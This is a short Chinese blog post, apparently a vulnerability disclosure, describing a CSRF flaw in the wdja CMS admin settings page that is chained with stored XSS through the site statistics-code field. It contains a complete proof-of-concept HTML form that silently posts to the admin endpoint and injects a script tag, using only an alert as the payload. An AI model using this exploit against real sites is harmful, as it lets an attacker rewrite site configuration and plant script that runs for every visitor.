其他分享
首页 > 其他分享> > wdja漏洞 csrf+xss 组和漏洞

wdja漏洞 csrf+xss 组和漏洞

作者:互联网

首先存在csrf漏洞,在项目issues里面都提到过,通过配合可以实现这样的攻击思路:

全站配置-》统计代码-》存在xss攻击

构建的 CSRF EXP:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://wdja/admin/global/manage.php?action=basic&backurl=/admin/global/manage.php?type=basic" method="POST">
      <input type="hidden" name="logo" value="" />
      <input type="hidden" name="download_name" value="" />
      <input type="hidden" name="download_url" value="" />
      <input type="hidden" name="demo_url" value="" />
      <input type="hidden" name="modules" value="download" />
      <input type="hidden" name="modules_img" value="download" />
      <input type="hidden" name="icp" value="" />
      <input type="hidden" name="tongji" value="<script>alert('csrf+xss漏洞')</script>"/>
      <input type="hidden" name="title" value="" />
      <input type="hidden" name="topic" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="description" value="" />
      <input type="hidden" name="baidupush_url" value="" />
      <input type="hidden" name="baidupush_token" value="" />
      <input type="hidden" name="baidupush" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

 


攻击截图:

 

标签:xss,组和,全站,CSRF,攻击,漏洞,csrf
来源: https://www.cnblogs.com/wayne-tao/p/13110663.html